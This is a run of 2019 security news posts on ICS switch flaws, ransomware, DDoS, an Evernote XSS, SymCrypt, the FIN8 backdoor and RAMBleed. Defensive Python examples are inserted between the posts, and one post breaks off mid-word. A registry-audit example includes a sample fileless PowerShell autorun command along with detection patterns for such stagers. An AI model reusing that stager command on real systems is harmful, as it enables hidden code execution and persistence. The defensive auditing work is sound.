The vulnerabilities affect WAGO industrial switches 852-303, 852-1305 and 852-1505 models. The company has already fixed the issues with the release of firmware versions 1.2.2.S0, 1.1.6.S0 and 1.1.5.S0, respectively.

“The industrial managed switch series 852 from WAGO is affected by multiple vulnerabilities such as old software components embedded in the firmware. Furthermore, hardcoded password hashes and credentials were also found by doing an automated scan with IoT Inspector.” reads the security advisory. “Two vulnerabilities (CVE-2017-16544 and CVE-2015-0235) were verified by emulating the device with the MEDUSA scaleable firmware runtime. The validity of the password hashes and the embedded keys were also verified by emulating the device.”

One of the most severe issues is related to the presence of hardcoded credentials that can be used to connect to the devices via Telnet and SSH.

“Hardcoded Credentials (CVE-2019-12550) – The device contains hardcoded users and passwords which can be used to login via SSH and Telnet.” continues the advisory.

The expert also found hardcoded private keys for the SSH daemon in the device’s firmware. An attacker can use them to carry out man-in-the-middle (MitM) attacks against the Dropbear SSH daemon without the victim noticing any fingerprint changes.

“The device contains hardcoded private keys for the SSH daemon. The fingerprint of the SSH host key from the corresponding SSH daemon matches to the embedded private key.” states the advisory.

SEC Consult also discovered that the WAGO industrial switches use outdated versions of the BusyBox UNIX toolkit and the GNU C Library (glibc). Both components are affected by known vulnerabilities, some of which are rated as critical.

Experts suggest restricting network access to the device and SSH server in order to protect the system. The good news is that affected switches are not exposed online.

The German VDE CERT has published an advisory to warn of the flaws in the WAGO devices.

Pierluigi Paganini

(SecurityAffairs – Wago industrial switches, hacking)


Ransomware paralyzed production for at least a week at ASCO factories

Malware infections can be devastating for production environments: a ransomware infection halted production operations for days at airplane parts manufacturer ASCO.

ASCO is one of the world's largest manufacturers of aerospace components.

The company has offices and production plants in Belgium, Canada, Germany, the US, Brazil, and France. ASCO provides components to Airbus, Boeing, Bombardier Aerospace, and Lockheed Martin.

A ransomware attack has paralyzed production in ASCO plants across several countries worldwide. The attack reportedly started on Friday, and at the time of writing the full extent of the internal damage is still unknown.

After the incident, nearly 1,000 employees out of 1,400 were sent home for the entire week, on paid leave.

[Image: ASCO]

As a result of having its IT systems crippled by the ransomware infection, the company has sent home approximately 1,000 of its 1,400 workers.

“Employees of the Asco company in Zaventem are technically unemployed for a few days because the company’s servers have been hacked. The company confirms that it has been hit by a cyber attack since Friday. A complaint has been submitted to the police.” states VRT (Flemish Radio and Television Broadcasting Organisation). “The public prosecutor says there are traces of “ransomware” found on the computers, with hackers asking ransom to re-release the blocked computers.”

The company reported the incident to the local authorities and hired third-party experts to investigate the attack.

“We have informed all competent authorities in this area of ​​this cyber attack and have brought in external experts to solve the problem,” says HR director Vicky Welvaert. “We are currently working on it with all our might.” Welvaert does not want to comment on whether the problem is now under control or from when the business activities will be restarted.

According to the media, the ransomware first hit the Zaventem plant in Belgium, but immediately afterwards ASCO also shut down production factories in Germany, Canada, and the US as a precaution.

At this time it is not clear whether the company decided to pay the ransom to restore its systems rapidly or simply restored its backups.

Although ASCO should be a privileged target for cyber spies, its representatives told The Brussels Times that there is currently no evidence of theft of information.

“The company also notified the authorities, and told the paper there is currently no evidence of the theft of information, but that it is taking the situation very seriously.” reported The Brussels Times.

“Although ransomware attacks are usually only about money, a company like Asco, which has connections in the defence sector, could also be a targe”

Pierluigi Paganini

(SecurityAffairs – ASCO, ransomware)


Massive DDos attack hit Telegram, company says most of junk traffic is from China

Encrypted messaging service Telegram was hit by a major DDoS attack apparently originated from China, likely linked to the ongoing political unrest in Hong Kong.

Telegram was used by protesters in Hong Kong to evade surveillance and coordinate their demonstrations against a proposed law that would allow extraditions from Hong Kong to mainland China.

Hong Kong is facing its worst political crisis since its 1997 handover from Britain to China.

While protesters were involved in violent demonstrations, repressed by the police with tear gas and rubber bullets, Telegram suffered a massive Distributed Denial of Service (DDoS) attack. Users mainly in South and North America were affected by a significant outage, but problems were also observed by users worldwide.

Hackers used a huge botnet to generate the traffic that made Telegram servers inaccessible.

However, users in other locations were also affected, as some people in Australia reported problems with loading video content.


According to Pavel Durov, Telegram’s CEO, most of the junk traffic originated from China.

Telegram kept its users updated via Twitter; at the time of writing it had restored normal operation.

Telegram is one of the most popular encrypted instant messaging apps that currently has over 200 million monthly active users.

Telegram is currently blocked in China by the country’s Great Firewall. Many people fear that the Beijing government will increase its influence on Hong Kong.

“The city’s special status under its handover agreement allows freedoms unseen in mainland China, but many fear they are under threat as Beijing exerts increasing influence on Hong Kong.” states the AFP.

“The current protests were sparked by fears that the proposed law would allow extraditions to China and leave people exposed to the mainland’s politicised and opaque justice system.”

Pierluigi Paganini

(SecurityAffairs – Hong Kong, DDoS)

The post Massive DDos attack hit Telegram, company says most of junk traffic is from China appeared first on Security Affairs.

Flaw in Evernote Web Clipper for Chrome extension allows stealing data

Security experts discovered a vulnerability in the popular Evernote Web Clipper for Chrome that can be exploited to steal sensitive data from sites visited by users.

Security experts at browser security firm Guardio discovered a critical universal cross-site scripting (XSS) vulnerability in the Evernote Web Clipper for Chrome.

“In May 2019 Guardio’s research team has discovered a critical vulnerability in Evernote Web Clipper for Chrome.” reads a blog post published by Guardio. “A logical coding error made it possible to break domain-isolation mechanisms and execute code on behalf of the user – granting access to sensitive user information not limited to Evernote’s domain.”

The vulnerability, tracked as CVE-2019-12592, could be exploited by attackers operating malicious websites to bypass the browser’s same-origin policy (SOP) and execute arbitrary code on the victim’s behalf.

The Evernote Web Clipper extension for Chrome allows users to easily save online content to Evernote, including web pages, articles, images, text, and emails. The popular extension has over 4.6 million users.

The attack scenario sees hackers tricking victims into visiting specially crafted websites that load hidden iframes.

The vulnerability discovered by the experts in the Evernote extension allows an attacker to inject a malicious payload into all iframe contexts and steal credentials, cookies, and other data.

Researchers published a video PoC of the attack that shows how hackers can steal a user’s Facebook information and data on PayPal transactions.

The researchers also provided a description of a Proof-of-Concept (PoC) attack to steal sensitive data from an unsuspecting user; below is the attack scenario:

  1. User navigates to the attacker’s malicious website (e.g. via social media, email, a compromised blog comment, etc.).
  2. Malicious website silently loads hidden, legitimate iframe tags of targeted websites.
  3. The exploit is triggered by the malicious website and causes Evernote’s internal infrastructure to inject an attacker controlled payload into all iframes contexts.
  4. Injected payload is customized for each targeted website, able to steal cookies, credentials, private information, perform actions as the user and more.
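Step 2 of the scenario above only works if the targeted site can be loaded in a cross-origin iframe on the attacker's page; a site that sends a Content-Security-Policy frame-ancestors directive (or the older X-Frame-Options header) is not loadable there and drops out of this class of extension-borne injection. The following is an added example, not code from Guardio or Evernote, that evaluates a site's response headers the way a browser would and tells a defender whether the page is framable from an arbitrary origin. The origins used (bank.example, attacker.example, partner.example) are constructed placeholders.

```python
"""Added example (not Guardio's or Evernote's code): decide whether a
response's headers let the page be framed by a given embedder origin.
Implements the browser rules for CSP frame-ancestors and X-Frame-Options;
origins in the usage are constructed placeholders.
"""
import re
from urllib.parse import urlsplit

_SCHEME_ONLY = re.compile(r"^[a-z][a-z0-9+.\-]*:$")
_HOST_SOURCE = re.compile(
    r"^(?:(?P<scheme>[a-z][a-z0-9+.\-]*)://)?(?P<wild>\*\.)?(?P<host>[^:/]+)(?::(?P<port>\d+|\*))?$"
)


def parse_frame_ancestors(csp: str):
    """Return the frame-ancestors source list (lower-cased), or None if the directive is absent."""
    for directive in csp.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]]   # an empty list behaves like 'none'
    return None


def _origin(u):
    return (u.scheme, u.hostname, u.port)


def _source_matches(source: str, embedder, target) -> bool:
    """Does one ancestor-source expression match the embedding origin?"""
    if source == "'none'":
        return False
    if source == "'self'":
        return _origin(embedder) == _origin(target)
    if source == "*":
        return True
    if _SCHEME_ONLY.match(source):                 # e.g. "https:"
        return embedder.scheme + ":" == source
    m = _HOST_SOURCE.match(source)
    if not m:
        return False                               # malformed expressions match nothing
    if m["scheme"] and embedder.scheme != m["scheme"]:
        return False
    host = embedder.hostname or ""
    if m["wild"]:
        # "*.example.com" matches subdomains only, never example.com itself
        if not host.endswith("." + m["host"]):
            return False
    elif host != m["host"]:
        return False
    if m["port"] and m["port"] != "*":
        default = {"https": 443, "http": 80}.get(embedder.scheme)
        if (embedder.port or default) != int(m["port"]):
            return False
    return True


def framing_allowed(headers: dict, embedder_origin: str, target_origin: str) -> bool:
    """True if a browser would render target_origin inside a frame on embedder_origin."""
    h = {k.lower(): v for k, v in headers.items()}
    embedder, target = urlsplit(embedder_origin), urlsplit(target_origin)
    csp = h.get("content-security-policy")
    if csp is not None:
        sources = parse_frame_ancestors(csp)
        if sources is not None:
            # When frame-ancestors is present, browsers ignore X-Frame-Options entirely.
            return any(_source_matches(s, embedder, target) for s in sources)
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return _origin(embedder) == _origin(target)
    # No header, or a value modern browsers do not honour (e.g. ALLOW-FROM): not blocked.
    return True


def audit(headers: dict, site: str, attacker: str = "https://attacker.example") -> str:
    """Defender-side verdict: can an unrelated origin (constructed placeholder) frame this site?"""
    return "framable" if framing_allowed(headers, attacker, site) else "protected"


if __name__ == "__main__":
    print(audit({}, "https://bank.example"))                                  # framable
    print(audit({"X-Frame-Options": "SAMEORIGIN"}, "https://bank.example"))   # protected
```

Run it against the headers your own sites return (for example from a curl -I capture) to find pages that are still framable; frame-ancestors is the form to prefer, since it takes precedence over X-Frame-Options and supports allow-lists.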

Below the timeline of the flaw:

  • May 27th, 2019 – Initial disclosure.
  • May 28th, 2019 – Follow-up email.
  • May 28th, 2019 – Issue confirmed and classified as a vulnerability.
  • May 29th, 2019 – Credited on Evernote’s Security Page.
  • May 31st, 2019 – Evernote Web Clipper 7.11.1 released.
  • June 4th, 2019 – Fix confirmed.

Pierluigi Paganini

(SecurityAffairs – Evernote Web Clipper for Chrome, hacking)

The post Flaw in Evernote Web Clipper for Chrome extension allows stealing data appeared first on Security Affairs.

The Tax Paying Hacker: A Modern Phenomenon

In a dark room lit only by the light from four computer monitors sits a hacker named Hector (not his real name). You can hear the faint pulse of an EDM track coming from his headphones as Hector taps away on his computer’s keyboard. The above description could serve as the setting for a hacker […]

The post The Tax Paying Hacker: A Modern Phenomenon appeared first on The State of Security.

Google expert disclosed details of an unpatched flaw in SymCrypt library

Tavis Ormandy, a white hat hacker at Google Project Zero, announced that he has found a zero-day flaw in SymCrypt, the cryptographic library of Microsoft’s operating system.

The recently released Microsoft Patch Tuesday security updates for June 2019 failed to address a flaw in SymCrypt, a core cryptographic function library currently used by Windows. The flaw could be exploited by malicious programs to trigger a denial of service condition by interrupting the encryption service for other programs.

The vulnerability was found by white hat hacker Tavis Ormandy from Google Project Zero. In line with Google’s 90-day disclosure policy, Ormandy publicly released details and a proof-of-concept of the vulnerability.

Ormandy privately reported the flaw to Microsoft in March 2019, but the tech giant failed to fix it within 90 days.

The unpatched vulnerability affects Windows 8 and later versions, servers included.

According to Microsoft, SymCrypt has been the primary library for implementing symmetric cryptographic algorithms since Windows 8; it also implements asymmetric cryptographic algorithms starting with Windows 10 version 1703.

Ormandy discovered that it is possible to trigger the flaw to cause an infinite loop when performing specific cryptographic operations.

“There’s a bug in the SymCrypt multi-precision arithmetic routines that can cause an infinite loop when calculating the modular inverse on specific bit patterns with bcryptprimitives!SymCryptFdefModInvGeneric.” wrote the expert.

“I’ve been able to construct an X.509 certificate that triggers the bug. I’ve found that embedding the certificate in an S/MIME message, authenticode signature, schannel connection, and so on will effectively DoS any windows server (e.g. ipsec, iis, exchange, etc) and (depending on the context) may require the machine to be rebooted. Obviously, lots of software that processes untrusted content (like antivirus) call these routines on untrusted data, and this will cause them to deadlock.”

The white hat hacker used a specially crafted X.509 digital certificate to trigger the flaw; he explained that any application running on the system that processes the certificate can trigger the vulnerability.

Specially crafted certificates could be provided in multiple ways, for example in digitally signed and encrypted messages via the S/MIME protocol.

Ormandy explained that in some cases it would be necessary to reboot the vulnerable machine to return it to a normal state.

Microsoft Security Response Center (MSRC) told the Google expert that the company will not be able to provide a security patch before next month.
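The bug described above is a modular-inverse routine that never terminates on certain operands arriving through untrusted input. The following added example, which is not SymCrypt's code and does not reproduce the reported bug, shows the two properties a defender wants in such a primitive: non-invertible inputs are reported rather than looped on, and the Euclidean loop carries an explicit step bound so that a broken invariant fails closed instead of hanging whatever parses the certificate. Python's arbitrary-precision integers stand in for a multi-precision library, so the point is the control flow, not the arithmetic width; the seeded comparison against the built-in pow(a, -1, m) is an assumption about how one would smoke-test such a routine, not a description of Microsoft's process.

```python
"""Added example: a modular-inverse routine that cannot spin forever on
attacker-chosen operands. Illustrative code, not SymCrypt's implementation
and not a reproduction of the reported bug.
"""
import random
from typing import Optional


class InverseLoopBound(RuntimeError):
    """Raised when the Euclidean loop exceeds its theoretical step bound."""


def modinv(a: int, m: int) -> Optional[int]:
    """Return a^-1 mod m, or None when no inverse exists."""
    if m < 2:
        return None
    a %= m
    if a == 0:
        return None                      # gcd(0, m) = m, never 1 for m >= 2
    old_r, r = a, m                      # remainder pair
    old_s, s = 1, 0                      # Bezout coefficients of a
    # Lame's theorem bounds Euclid at roughly 1.44 * bit_length(m) division
    # steps; 2 * bit_length + 4 leaves slack for the initial swap and small m.
    max_steps = 2 * m.bit_length() + 4
    steps = 0
    while r != 0:
        steps += 1
        if steps > max_steps:            # fail closed instead of hanging the caller
            raise InverseLoopBound(f"exceeded {max_steps} steps for m={m}")
        q = old_r // r
        old_r, r = r, old_r - q * r
        old_s, s = s, old_s - q * s
    if old_r != 1:
        return None                      # gcd(a, m) > 1: not invertible
    return old_s % m


def fuzz_check(trials: int = 2000, bits: int = 256, seed: int = 1) -> int:
    """Count disagreements between modinv and pow(a, -1, m) on seeded random operands."""
    rng = random.Random(seed)
    mismatches = 0
    for _ in range(trials):
        # full-width odd moduli so that m >= 2 always holds
        m = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        a = rng.getrandbits(bits)
        try:
            expected = pow(a, -1, m)
        except ValueError:               # the built-in signals "not invertible"
            expected = None
        if modinv(a, m) != expected:
            mismatches += 1
    return mismatches


if __name__ == "__main__":
    print(modinv(3, 11), modinv(6, 9))   # 4 None
    print("mismatches:", fuzz_check())   # 0
```

The step bound is cheap insurance: on a correct routine it never fires, and on a routine with a subtle arithmetic bug it converts an infinite loop into an exception the caller can treat as a malformed certificate.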

Pierluigi Paganini

(SecurityAffairs – SymCrypt, hacking)

The post Google expert disclosed details of an unpatched flaw in SymCrypt library appeared first on Security Affairs.

FIN8 Hacking Group is back with an improved version of the ShellTea Backdoor

After two years of silence, FIN8 group is back and carried out a new campaign against the hotel-entertainment industry employing the ShellTea/PunchBuggy backdoor.

Two years after the last report, the FIN8 group is back and carried out a new campaign against the hotel-entertainment industry using an improved version of the ShellTea/PunchBuggy backdoor.

The last time security experts documented the FIN8’s activities was in 2016 and 2017. At the time, FireEye and root9B published detailed reports about a series of attacks targeting the retail sector.

FireEye documented obfuscation techniques used by the group in June 2017 and the involvement of PUNCHTRACK POS-scraping malware.

The ShellTea backdoor was analyzed by researchers at root9B in June 2017; the malware was used by threat actors to deliver PoS malware.

Now experts at Morphisec revealed to have observed a new campaign attributed to the FIN8 group that targeted entities in the hotel-entertainment industry.

“During the period of March to May 2019, Morphisec Labs observed a new, highly sophisticated variant of the ShellTea / PunchBuggy backdoor malware that attempted to infiltrate a number of machines within the network of a customer in the hotel-entertainment industry.” reads the analysis published by Morphisec. “It is believed that the malware was deployed as a result of several phishing attempts.”

Experts believe the attackers launched phishing attacks in an attempt to deliver PoS malware.

Researchers also gathered evidence of overlap between FIN8 and FIN7 attacks, even if the two groups are considered separate.

“Given the nature of the industry targeted in the attack uncovered by Morphisec, we assume that this was also an attempted POS attack.” continues the analysis. “In this report, we investigate this latest variant of ShellTea, together with the artifacts it downloaded after the Morphisec Labs team detonated a sample in a safe environment.”

The attack chain starts with a fileless dropper using PowerShell code executed from registry keys and leading to ShellTea.

ShellTea attempts to evade detection by checking for the presence of virtualized environments and standard analysis tools. The malicious code uses a hashing algorithm for most of its functions; the algorithm is similar to the one implemented in the previous ShellTea version.

ShellTea is then injected into Explorer; it communicates with the C2 over HTTPS and supports various commands, such as loading and executing a delivered executable, creating/executing processes, executing any PowerShell command using the downloaded native Empire ReflectivePicker, and of course downloading and executing PoS malware.

Attackers use the PowerShell script to collect information on the user and the network, then send the Gzipped data to the C2 and delete it.

Experts pointed out that attackers are constantly innovating their arsenal; their new techniques are able to easily evade standard POS defenses.

“The hospitality industry, and particularly their POS networks, continues to be one of the industries most targeted by cybercrime groups. In addition to this attack by FIN8, we’ve seen multiple attacks by FIN6, FIN7 and others.” concludes Morphisec. “Many POS networks are running on the POS version of Windows 7, making them more susceptible to vulnerabilities. What’s more, attackers know that many POS systems run with only rudimentary security as traditional antivirus is too heavy and requires constant updating that can interfere with system availability.”

“As we see here, attack syndicates are constantly innovating and learn from their mistakes – the numerous improvements and bug fixes from the previous version of ShellTea are evident. The techniques implemented can easily evade standard POS defenses.”
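The attack chain above starts with a fileless dropper: PowerShell launched from an autorun entry that pulls its real payload out of another registry value. One way to hunt for that pattern on endpoints is to export the relevant hives and audit them offline. The following is an added example with constructed detection heuristics, not Morphisec's or FIN8's code; the .reg text it parses is a constructed sample whose key paths, value names and blob are placeholders, not indicators from the report.

```python
"""Added example: audit a Windows registry export for autorun entries that
launch PowerShell from registry-resident data. Heuristics are constructed
for this illustration, not Morphisec's; the .reg text is constructed sample
input (placeholder paths and names). Real exports are UTF-16 text, so read
them with open(path, encoding="utf-16").
"""
import base64
import re
from typing import Dict, List

_BLOB = base64.b64encode(b"placeholder " * 60).decode()   # stands in for a stored payload
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\u\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Updater"="powershell.exe -nop -w hidden -c \"iex (gp HKCU:\\Software\\Contoso\\Cfg).Data\""

[HKEY_CURRENT_USER\Software\Contoso\Cfg]
"Data"="__BLOB__"
'''.replace("__BLOB__", _BLOB)

_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


def _unescape(s: str) -> str:
    return re.sub(r"\\(.)", r"\1", s)   # .reg escapes backslash and quote with a backslash


def parse_reg(text: str) -> Dict[str, Dict[str, str]]:
    """Return {key_path: {value_name: data}}; string data is unescaped, other types kept raw."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and line.startswith('"'):
            m = _VALUE_RE.match(line)
            if not m:
                continue
            data = m.group(2)
            if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
                data = _unescape(data[1:-1])
            keys[current][_unescape(m.group(1))] = data
    return keys


_AUTORUN_SUFFIXES = ("\\currentversion\\run", "\\currentversion\\runonce")
_PS_RE = re.compile(r'(^|[\\\s"])(powershell|pwsh)(\.exe)?\b', re.I)
_INDICATORS = [
    ("hidden window",          re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)),
    ("encoded command",        re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("profile/policy bypass",  re.compile(r"-(nop|noprofile|ep\s+bypass|executionpolicy\s+bypass)\b", re.I)),
    ("invoke-expression",      re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("reads registry payload", re.compile(r"\b(gp|get-itemproperty(value)?)\b.*\bHK(CU|LM):", re.I)),
]
_BLOB_RE = re.compile(r"^[A-Za-z0-9+/=]{400,}$")


def audit_reg(text: str) -> List[dict]:
    """Flag PowerShell autoruns and large opaque blobs parked under non-autorun keys."""
    findings = []
    for key, values in parse_reg(text).items():
        is_autorun = key.lower().endswith(_AUTORUN_SUFFIXES)
        for name, data in values.items():
            reasons = []
            if is_autorun and _PS_RE.search(data):
                reasons.append("powershell autorun")
                reasons += [label for label, rx in _INDICATORS if rx.search(data)]
            if not is_autorun and _BLOB_RE.match(data):
                reasons.append("large opaque blob outside autorun key")
            if reasons:
                findings.append({"key": key, "value": name, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_reg(SAMPLE_REG):
        print(f["key"], f["value"], f["reasons"])
```

The two findings it raises on the sample, a PowerShell autorun that reads a registry value and a large opaque blob sitting under an unrelated key, are exactly the pair a fileless stager leaves behind; seeing both on one host is a much stronger signal than either alone.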

Pierluigi Paganini

(SecurityAffairs – FIN8, hacking)

The post FIN8 Hacking Group is back with an improved version of the ShellTea Backdoor appeared first on Security Affairs.

Radiohead releases a trove of stolen music in response to the hack

The English rock band Radiohead released an 18-hour trove of private recordings from their 1997 album “OK Computer” in response to the recent hack.

The alternative rock band Radiohead released an 18-hour trove of private recordings from their 1997 album “OK Computer” after being hacked by crooks that demanded a ransom of $150,000 for the music.

Radiohead uploaded 1.8 gigabytes of recordings, live performances, and some unpublished songs on their website (radiohead.bandcamp.com).


The hackers’ dream of making money from the stolen music vanished; now anyone can access it for free.

The group is also offering for sale downloads of an album of the 18 hacked MiniDiscs for £18 and donating the proceeds to the Extinction Rebellion environmental campaign group. That’s amazing guys!

“We’ve been hacked,” explained frontman Thom Yorke.

“It’s not v interesting,” he added. “As it’s out there it may as well be out there, until we all get bored and move on.”

Below is the tweet published by the band’s guitarist, Jonny Greenwood, confirming that the hack occurred last week.

“Someone stole Thom’s minidisk archive from around the time of OK Computer, and reportedly demanded $150,000 on threat of releasing it,” Greenwood wrote.

“So instead of complaining — much — or ignoring it, we’re releasing all 18 hours on Bandcamp in aid of Extinction Rebellion.”

Immediately after the hack, the Reddit user ‘u/santicol’ revealed that someone claiming to have the stolen music had approached a “well-known leaker” and offered them previews of the tracks.

“The user described how someone claiming to have the archive came in contact with a “well-known leaker” and offered them previews of the tracks.” reported the AFP press.

“They were asking upwards of $150,000 for the entire set, at $800 per studio track and $50 per live track,” added the Reddit user.

“The leaker seems to be well known in some spaces and has a history of trading in very rare/high profile material.”

Pierluigi Paganini

(SecurityAffairs – Radiohead, hacking)

The post Radiohead releases a trove of stolen music in response to the hack appeared first on Security Affairs.

RAMBleed, a new Side-Channel Attack that allows stealing sensitive data

Security researchers disclosed the details of RAMBleed, a new type of side-channel attack on DRAM that allows stealing sensitive data from memory.

A team of academics from several universities has disclosed the details of a new type of side-channel attack on dynamic random-access memory (DRAM), dubbed RAMBleed. The RAMBleed issue, tracked as CVE-2019-0174, could be used by attackers to potentially obtain sensitive data from the system’s memory.

“RAMBleed is based on a previous side channel called Rowhammer, which enables an attacker to flip bits in the memory space of other processes. We show in our paper that an attacker, by observing Rowhammer-induced bit flips in her own memory, can deduce the values in nearby DRAM rows. Thus, RAMBleed shifts Rowhammer from being a threat not only to integrity, but confidentiality as well.” wrote the experts.


RAMBleed is based on the Rowhammer attack technique devised by researchers at the Google Project Zero team back in 2015.

To better understand the Rowhammer flaw, recall that DDR memory is arranged in an array of rows and columns. Blocks of memory are assigned to various services and applications. To prevent an application from accessing the memory space reserved for another application, the system implements a “sandbox” protection mechanism.

The bit-flipping technique enabled by the Rowhammer problem could be exploited to evade the sandbox.

The researchers at Google Project Zero started from a previous study conducted by Yoongu Kim titled “Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors”. 

In modern chips, DRAM density is high and it is hard to prevent DRAM cells from interacting electrically with each other.

The Project Zero hacking elite team demonstrated two proof-of-concept exploits that allowed them to control several x86 computers running Linux, according to the experts the attacks could work with other operating systems as well.

Now researchers from the University of Michigan, Graz University of Technology and University of Adelaide demonstrated that an attacker with limited privileges can use a Rowhammer attack to deduce bits in nearby rows. This means that an attacker could obtain data associated with other processes and the kernel.

Previous Rowhammer attack techniques were based on write side-channels: attackers leverage persistent bit flips, which can be mitigated by error-correcting code (ECC) memory. RAMBleed is different because it relies on a read side-channel and does not require persistent bit flips.

“It is widely assumed however, that bit flips within the adversary’s own private memory have no security implications, as the attacker can already modify its private memory via regular write operations. We demonstrate that this assumption is incorrect, by employing Rowhammer as a read side channel.” reads the research paper. “More specifically, we show how an unprivileged attacker can exploit the data dependence between Rowhammer induced bit flips and the bits in nearby rows to deduce these bits, including values belonging to other processes and the kernel.”

The researchers developed new memory massaging techniques to carefully place the victim’s secret data in the rows above and below the attacker’s memory row. In this way, the bit flips in the attacker’s rows depend on the values of the victim’s secret data.

“The attacker can then use Rowhammer to induce bit flips in her own memory, thereby leaking the victim’s secret data,” added the researchers.

The experts demonstrated the RAMBleed attack by targeting OpenSSH and leaking a 2048-bit RSA key; of course this is just one possible target, and the technique could be used to steal other potentially sensitive data.

RAMBleed has been shown to work against devices using DDR3 and DDR4 memory modules, and it potentially works on many other computers.

Experts suggest upgrading memory modules to DDR4 with targeted row refresh (TRR) enabled, because it makes exploitation of the flaw harder.

At the time of writing there is no evidence that RAMBleed has been exploited in attacks in the wild.
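The mitigation advice above, prefer DDR4 with TRR and keep ECC where persistent flips matter, turns into an inventory question for a fleet: which hosts still run DDR3 or non-ECC memory? The following added example, not from the RAMBleed paper, answers it from dmidecode output, which is how memory type and the array's error-correction capability are exposed on Linux. The dmidecode text it parses is a constructed sample in the real tool's layout, with placeholder values for one host; note that TRR is a controller/DRAM feature dmidecode does not report, so this check covers generation and ECC only.

```python
"""Added example (not from the RAMBleed paper): inventory DRAM generation and
ECC support from `dmidecode` output. The sample below is constructed in the
real tool's layout; handles, sizes and vendor strings are placeholders.
"""
import re
from typing import Dict, List

SAMPLE_DMIDECODE = """\
# dmidecode 3.2
Getting SMBIOS data from sysfs.
SMBIOS 3.0 present.

Handle 0x0010, DMI type 16, 23 bytes
Physical Memory Array
\tLocation: System Board Or Motherboard
\tUse: System Memory
\tError Correction Type: None
\tMaximum Capacity: 64 GB
\tNumber Of Devices: 4

Handle 0x0011, DMI type 17, 40 bytes
Memory Device
\tArray Handle: 0x0010
\tSize: 8192 MB
\tForm Factor: DIMM
\tLocator: DIMM_A1
\tType: DDR3
\tType Detail: Synchronous
\tSpeed: 1600 MT/s
\tManufacturer: Placeholder

Handle 0x0012, DMI type 17, 40 bytes
Memory Device
\tArray Handle: 0x0010
\tSize: No Module Installed
\tForm Factor: DIMM
\tLocator: DIMM_A2
\tType: Unknown
"""


def parse_dmidecode(text: str) -> List[Dict[str, str]]:
    """Split dmidecode output into records: {'_handle': .., '_type': 'Memory Device', field: value}."""
    records, current = [], None
    for line in text.splitlines():
        if not line.strip():
            current = None                      # blank line ends a record
            continue
        if line.startswith("Handle "):
            current = {"_handle": line.split(",")[0].split()[1]}
            records.append(current)
        elif current is not None and not line.startswith("\t") and "_type" not in current:
            current["_type"] = line.strip()     # the structure name follows the Handle line
        elif current is not None and line.startswith("\t") and ":" in line:
            k, _, v = line.strip().partition(":")
            current[k.strip()] = v.strip()
    return records


def classify_module(mem_type: str, ecc_type: str) -> List[str]:
    """Flags for one populated module: generation before DDR4, and absence of ECC."""
    flags = []
    m = re.search(r"DDR(\d)?", mem_type.upper())
    if m is None:
        flags.append("type-unknown")
    elif int(m.group(1) or 1) < 4:
        flags.append("pre-ddr4")
    if ecc_type in ("None", "Parity"):          # parity detects, it does not correct
        flags.append("no-ecc")
    elif ecc_type not in ("Single-bit ECC", "Multi-bit ECC", "CRC"):
        flags.append("ecc-unknown")
    return flags


def memory_risk_report(text: str) -> dict:
    """Join each populated Memory Device to its Physical Memory Array and classify it."""
    recs = parse_dmidecode(text)
    arrays = {r["_handle"]: r for r in recs if r.get("_type") == "Physical Memory Array"}
    modules = []
    for r in recs:
        if r.get("_type") != "Memory Device" or r.get("Size", "").startswith("No Module"):
            continue
        ecc = arrays.get(r.get("Array Handle", ""), {}).get("Error Correction Type", "Unknown")
        mtype = r.get("Type", "Unknown")
        modules.append({"locator": r.get("Locator", "?"), "size": r.get("Size", "?"),
                        "type": mtype, "ecc": ecc, "flags": classify_module(mtype, ecc)})
    return {"modules": modules, "at_risk": [m["locator"] for m in modules if m["flags"]]}


if __name__ == "__main__":
    print(memory_risk_report(SAMPLE_DMIDECODE))
```

Feeding it the saved output of `dmidecode -t memory` from each host gives a per-slot list; the `at_risk` entries are the machines where a hardware refresh, rather than a software patch, is the only real fix.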

Pierluigi Paganini

(SecurityAffairs – RAMBleed, hacking)

The post RAMBleed, a new Side-Channel Attack that allows stealing sensitive data appeared first on Security Affairs.

Microsoft Patch Tuesday security updates for June 2019 fix 88 flaws

Microsoft releases Patch Tuesday security updates for June 2019 that address 88 vulnerabilities in Windows OS and other products.

Microsoft Patch Tuesday security updates for June 2019 address 88 vulnerabilities in Windows OS and other products of the tech giant (Internet Explorer, Microsoft Edge browser, Microsoft Office and Services, ChakraCore, Skype for Business, Microsoft Lync, Microsoft Exchange Server, and Azure).

21 out of the 88 flaws are rated Critical in severity, 66 Important, and only one Moderate.

Microsoft addressed four publicly disclosed privilege escalation issues rated as Important. None of these vulnerabilities was exploited in attacks in the wild.

The flaws were disclosed by the researcher SandboxEscaper over the past weeks, below the list of the issue:

One of the critical vulnerabilities fixed by Microsoft is a Windows Hyper-V Remote Code Execution issue tracked as CVE-2019-0620.

“A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system. To exploit the vulnerability, an attacker could run a specially crafted application on a guest operating system that could cause the Hyper-V host operating system to execute arbitrary code.” reads the security advisory.

“An attacker who successfully exploited the vulnerability could execute arbitrary code on the host operating system.”

Microsoft fixed a total of three critical remote code execution vulnerabilities in Windows Hyper-V (CVE-2019-0620, CVE-2019-0709, CVE-2019-0722), the Microsoft virtualization software that allows running multiple operating systems as virtual machines on Windows.

The remote code execution flaws in Hyper-V allow an attacker to execute arbitrary code on the host operating system just by running a specially crafted application on a guest operating system.

